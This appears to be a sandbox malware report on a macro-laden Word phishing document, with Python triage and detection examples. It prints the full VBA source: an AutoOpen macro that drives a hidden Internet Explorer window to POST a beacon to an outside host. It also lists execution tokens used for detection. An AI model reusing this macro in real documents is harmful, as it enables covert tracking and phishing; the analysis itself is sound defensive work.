Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE (binary Word) document containing VBA macros. Its AutoOpen macro instantiates InternetExplorer.Application through CreateObject and drives a hidden IE window to issue an HTTP POST to http://anwalts-kanzleien-bern.ch/id0005 (in the source the URL literal is padded with `#` characters, which the macro's own Clean() helper strips before use). The POST body is the constant string data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw==, whose base64 value decodes to "Dummy data from HTTP-only macro"; the request is retried up to MAX_ATTEMPTS = 3 times with a CONNECTION_TIMEOUT of 60 seconds per attempt, and the macro exits without contacting the server if the URL still contains the unsubstituted template placeholder %lucy_url%. The Content-Type header it sends is terminated with Chr(10) + Chr(13), i.e. LF CR rather than CR LF, a small but usable detection artefact. The recovered source therefore shows a callback on open (a beacon that tells the server who opened the file and from where), not a downloader: nothing is fetched, written to disk or executed in the visible code, so the "download a second-stage payload" reading is not supported by the macro as recovered. The placeholder and the "dummy data" body suggest a templated document, possibly a phishing kit or an awareness-simulation template; that is an inference, not something the sample itself establishes, and whether the server ever returned anything further cannot be determined from the static artifacts on this page. The document body prompts the user to enable content and macros, indicating a social-engineering lure.
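As an added worked example (not part of the analyzer's output or of the sample), the Python below reproduces the checks behind that summary from the decoded macro: it ports the sample's own Clean() helper to recover the real callback URL from the `#`-padded literal, decodes the base64 POST body, and lists auto-exec entry points, CreateObject ProgIDs and unsubstituted %...% placeholders. MACRO_SRC is a constructed excerpt of the macros.bas listed further down (padding shortened); the helper names are the example's own.

```python
"""Source-level triage of the macro recovered from this sample.

Added illustration for this report; it is not the analyzer's own code.
MACRO_SRC is a constructed excerpt of the extracted macros.bas shown on
this page (the URL's '#' padding is shortened). The helpers recover the
callback URL exactly as the sample's own Clean() does, decode the fixed
POST body, and list the facts a reviewer should weigh before calling the
macro a downloader.
"""
import base64
import binascii
import re
from typing import Optional

MACRO_SRC = r'''
Sub RunProcess(sURL)
    If InStr(1, sURL, "%lucy_url%") > 0 Then
        Exit Sub
    End If
    While IEPostData(sURL, "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw==") = False And lAttempt < MAX_ATTEMPTS
    Wend
End Sub
Function IEPostData(sURL, sData)
    Set objIE = CreateObject("InternetExplorer.Application")
    objIE.Visible = False
    objIE.Navigate sURL, Nothing, Nothing, bData, "Content-Type: application/x-www-form-urlencoded"
End Function
Function Clean(data)
    If InStr(1, data, "#") > 0 Then
        Clean = Left(data, InStr(1, data, "#") - 1)
    Else
        Clean = data
    End If
End Function
Sub AutoOpen()
    sURL = "http://anwalts-kanzleien-bern.ch/id0005##########"
    RunProcess Clean(sURL)
End Sub
'''

# Office auto-execution entry points worth flagging (example list, not exhaustive).
AUTO_EXEC_NAMES = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose",
                   "Document_Open", "Document_Close", "Workbook_Open")


def vba_clean(value: str) -> str:
    """Port of the sample's Clean(): keep everything before the first '#'."""
    cut = value.find("#")
    return value if cut < 0 else value[:cut]


def string_literals(src: str) -> list:
    """Every double-quoted VBA string literal, in source order."""
    return re.findall(r'"([^"\r\n]*)"', src)


def callback_urls(src: str) -> list:
    """URL literals with the sample's '#' padding stripped, de-duplicated."""
    seen = []
    for lit in string_literals(src):
        if re.match(r"https?://", lit, re.I):
            url = vba_clean(lit)
            if url not in seen:
                seen.append(url)
    return seen


def post_bodies(src: str) -> list:
    """Literals shaped like key=value; value decoded when it is valid base64, else None."""
    out = []
    for lit in string_literals(src):
        m = re.match(r"^(\w+)=(.*)$", lit)
        if not m:
            continue
        key, raw = m.group(1), m.group(2)
        decoded: Optional[str]
        try:
            decoded = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None
        out.append((key, raw, decoded))
    return out


def auto_exec_procs(src: str) -> list:
    """Names of Sub/Function declarations that Office runs automatically."""
    names = "|".join(AUTO_EXEC_NAMES)
    pat = rf"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+({names})\b"
    return re.findall(pat, src, re.I | re.M)


def createobject_progids(src: str) -> list:
    """ProgIDs passed as string literals to CreateObject()."""
    return re.findall(r'CreateObject\s*\(\s*"([^"]+)"', src, re.I)


def template_placeholders(src: str) -> list:
    """Unsubstituted %name% tokens; the sample exits if one survives in its URL."""
    return sorted(set(re.findall(r"%[A-Za-z_]+%", src)))


def triage(src: str) -> dict:
    return {
        "auto_exec": auto_exec_procs(src),
        "progids": createobject_progids(src),
        "callback_urls": callback_urls(src),
        "post_bodies": post_bodies(src),
        "placeholders": template_placeholders(src),
    }


if __name__ == "__main__":
    for key, value in triage(MACRO_SRC).items():
        print(f"{key}: {value}")
```

Run against the constructed excerpt this yields one auto-exec entry point (AutoOpen), one ProgID (InternetExplorer.Application), the trimmed URL, and a POST body that decodes to plain text rather than to an executable or a URL, which is the concrete reason to classify the macro as a beacon rather than a downloader.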
Heuristics (6)
- VBA macros detected (medium; 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro, i.e. a procedure Word runs automatically when the document is opened with macros enabled.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call; in this sample the ProgID is InternetExplorer.Application (see the extracted source below).
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents (for example VBA-stomped files) where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Read it alongside the extracted macros.bas artifact: a VBA project was recovered for this sample, so the marker most plausibly matched the same AutoOpen name that the VBA project declares rather than a separate WordBasic macro.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://anwalts-kanzleien-bern.ch/id0005################################################################################################################### (in document text, OLE body; the same padded literal the AutoOpen macro trims with Clean() before posting to it)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; the DrawingML XML namespace, expected in Office markup and not an indicator)
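The OLE_VBA_PCODE_AUTOEXEC_EXEC finding is the one that still fires when source extraction fails, so it is worth seeing how such a check works. As an added example that is not the analyzer's implementation (which may differ), the Python below reproduces the idea in simplified form: scan a compiled VBA stream for auto-exec names alongside execution primitives, in both 8-bit and UTF-16LE encodings, and fire only when both classes are present. The token lists and the STREAM_* byte strings are constructed for the example, not carved from this sample.

```python
"""Simplified version of the "compiled stream contains auto-exec and
execution tokens" idea behind OLE_VBA_PCODE_AUTOEXEC_EXEC.

Added illustration for this report; the analyzer's real heuristic is not
reproduced here. Identifier names survive in the compiled VBA project
even when the source text has been stomped or fails to extract, and they
may be stored as 8-bit text or as UTF-16LE, so both encodings are
searched. STREAM_* are constructed byte strings standing in for module
and _VBA_PROJECT streams; they are not carved from this sample.
"""

# Example token lists (not exhaustive, not the analyzer's lists).
AUTO_EXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose", "AutoNew",
                    "Document_Open", "Document_Close", "Workbook_Open",
                    "Workbook_Activate")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "ShellExecute", "WScript.Shell",
               "URLDownloadToFile", "XMLHTTP", "InternetExplorer.Application",
               "Scripting.FileSystemObject", "WinHttp.WinHttpRequest")

FILLER = b"\x00\x01\xff\x7e\x10\x00"  # constructed non-text bytes between names


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed "stomped" stream: no source text, but the name table still
# carries the entry point (8-bit) and the COM primitives (UTF-16LE).
STREAM_STOMPED = (FILLER + b"AutoOpen" + FILLER + _u16("CreateObject") + FILLER
                  + _u16("InternetExplorer.Application") + FILLER)
# Constructed stream with an auto-exec entry point but no execution primitive.
STREAM_BENIGN = FILLER + b"Document_Open" + FILLER + _u16("ActiveDocument") + FILLER
# Constructed stream with an execution primitive that needs a user click.
STREAM_MANUAL = FILLER + b"CreateObject" + FILLER + _u16("Button1_Click")


def find_tokens(data: bytes, tokens) -> list:
    """(token, encoding, offset) for every case-insensitive hit in either encoding."""
    hay = data.lower()  # bytes.lower() touches ASCII only, so UTF-16LE NULs survive
    hits = []
    for tok in tokens:
        needles = (("ascii", tok.lower().encode("ascii")),
                   ("utf-16le", tok.lower().encode("utf-16-le")))
        for enc, needle in needles:
            off = hay.find(needle)
            while off != -1:
                hits.append((tok, enc, off))
                off = hay.find(needle, off + 1)
    return sorted(hits, key=lambda h: h[2])


def pcode_autoexec_exec(data: bytes) -> dict:
    """Fire only when an auto-exec name and an execution primitive co-occur."""
    auto = find_tokens(data, AUTO_EXEC_TOKENS)
    execs = find_tokens(data, EXEC_TOKENS)
    return {"fires": bool(auto) and bool(execs), "auto_exec": auto, "exec": execs}


if __name__ == "__main__":
    for name, stream in (("stomped", STREAM_STOMPED), ("benign", STREAM_BENIGN),
                         ("manual", STREAM_MANUAL)):
        print(name, pcode_autoexec_exec(stream))
```

Token co-occurrence in a compiled stream is weaker evidence than recovered source: identifier tables of legitimate projects also contain CreateObject or Shell, so the check is scored on the combination with an auto-exec name and should be corroborated against decoded source whenever, as for this sample, extraction succeeds.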
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6315 bytes | 20594179a226855be310f1bf88c2301c668a80d117f1146e8d10b3f00a0c1063 |
Preview: first 1,000 lines of the extracted script. The listing is reproduced unmodified as evidence: the decoded source of the ThisDocument and NewMacros module streams first, then the analyzer-appended, comment-prefixed p-code disassembly (pcodedmp output format; the "Processing file:" path is the analyzer's staging copy, not a path from the sample). Read the disassembly with one caveat: its identifier names are resolved from the project's name table and are visibly shifted relative to the source here (Line #8 labels the procedure Sub NewMacros(MAX_ATTEMPTS) where the source has Sub RunProcess(sURL), and the three Consts appear as Office, ThisDocument and _Evaluate), so match on opcodes and literals rather than on names: LitDI2 0x0003, 0x003C and 0x0004 are MAX_ATTEMPTS = 3, CONNECTION_TIMEOUT = 60 and HTTP_READY = 4, and the LitStr operands carry the %lucy_url% guard and the base64 POST body.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Option Explicit
'Option Base 0
Const MAX_ATTEMPTS = 3
Const CONNECTION_TIMEOUT = 60
Const HTTP_READY = 4
' Run process
Sub RunProcess(sURL)
Dim lAttempt, tmr
If InStr(1, sURL, "%lucy_url%") > 0 Then
Exit Sub
End If
lAttempt = 0
' Post data
While IEPostData(sURL, "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw==") = False And lAttempt < MAX_ATTEMPTS
tmr = Timer()
Do
Loop Until (Timer() - tmr) > 1
lAttempt = lAttempt + 1
Wend
On Error Resume Next
End Sub
' IE post data
Function IEPostData(sURL, sData)
On Error Resume Next
Dim dtmp, objIE
Dim bData() As Byte
ReDim bData(Len(sData) - 1)
bData = StrConv(sData, vbFromUnicode)
Set objIE = CreateObject("InternetExplorer.Application")
objIE.Visible = False
objIE.Navigate sURL, Nothing, Nothing, bData, "Content-Type: application/x-www-form-urlencoded" + Chr(10) + Chr(13)
dtmp = Timer()
Do
Loop Until (Not objIE.busy And objIE.ReadyState = HTTP_READY) Or (Timer() - dtmp) > CONNECTION_TIMEOUT
IEPostData = (Not objIE.busy And objIE.ReadyState = HTTP_READY)
objIE.Quit
Set objIE = Nothing
End Function
' Clean variable string
Function Clean(data)
If InStr(1, data, "#") > 0 Then
Clean = Left(data, InStr(1, data, "#") - 1)
Else
Clean = data
End If
End Function
' Main function
Sub AutoOpen()
Dim sURL
sURL = "http://anwalts-kanzleien-bern.ch/id0005###################################################################################################################"
RunProcess Clean(sURL)
End Sub
''
' Processing file: /opt/analyzer/scan_staging/36331bb9fb4d434ba53b6823531ead0e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1073 bytes
' Macros/VBA/NewMacros - 4778 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' QuoteRem 0x0000 0x000D "Option Base 0"
' Line #2:
' Line #3:
' Dim (Const)
' LitDI2 0x0003
' VarDefn Office
' Line #4:
' Dim (Const)
' LitDI2 0x003C
' VarDefn ThisDocument
' Line #5:
' Dim (Const)
' LitDI2 0x0004
' VarDefn _Evaluate
' Line #6:
' Line #7:
' QuoteRem 0x0000 0x000C " Run process"
' Line #8:
' FuncDefn (Sub NewMacros(MAX_ATTEMPTS))
' Line #9:
' Dim
' VarDefn CONNECTION_TIMEOUT
' VarDefn HTTP_READY
' Line #10:
' Line #11:
' LitDI2 0x0001
' Ld MAX_ATTEMPTS
' LitStr 0x000A "%lucy_url%"
' FnInStr3
' LitDI2 0x0000
' Gt
' IfBlock
' Line #12:
' ExitSub
' Line #13:
' EndIfBlock
' Line #14:
' Line #15:
' LitDI2 0x0000
' St CONNECTION_TIMEOUT
' Line #16:
' Line #17:
' QuoteRem 0x0004 0x000A " Post data"
' Line #18:
' Ld MAX_ATTEMPTS
' LitStr 0x0031 "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw=="
' ArgsLd RunProcess 0x0002
' LitVarSpecial (False)
' Eq
' Ld CONNECTION_TIMEOUT
' Ld Office
' Lt
' And
' While
' Line #19:
' ArgsLd sURL 0x0000
' St HTTP_READY
' Line #20:
' Line #21:
' Do
' Line #22:
' ArgsLd sURL 0x0000
' Ld HTTP_READY
' Sub
' Paren
' LitDI2 0x0001
' Gt
' LoopUntil
' Line #23:
' Line #24:
' Ld CONNECTION_TIMEOUT
' LitDI2 0x0001
' Add
' St CONNECTION_TIMEOUT
' Line #25:
' Wend
' Line #26:
' Line #27:
' OnError (Resume Next)
' Line #28:
' EndSub
' Line #29:
' Line #30:
' QuoteRem 0x0000 0x000D " IE post data"
' Line #31:
' FuncDefn (Function RunProcess(MAX_ATTEMPTS, lAttempt))
' Line #32:
' OnError (Resume Next)
' Line #33:
' Line #34:
' Dim
' VarDefn tmr
' VarDefn IEPostData
' Line #35:
' Dim
' VarDefn Timer (As Byte)
' Line #36:
' Line #37:
' OptionBase
' Ld lAttempt
' FnLen
' LitDI2 0x0001
' Sub
' Redim Timer 0x0001 (As Variant)
' Line #38:
'
... (truncated)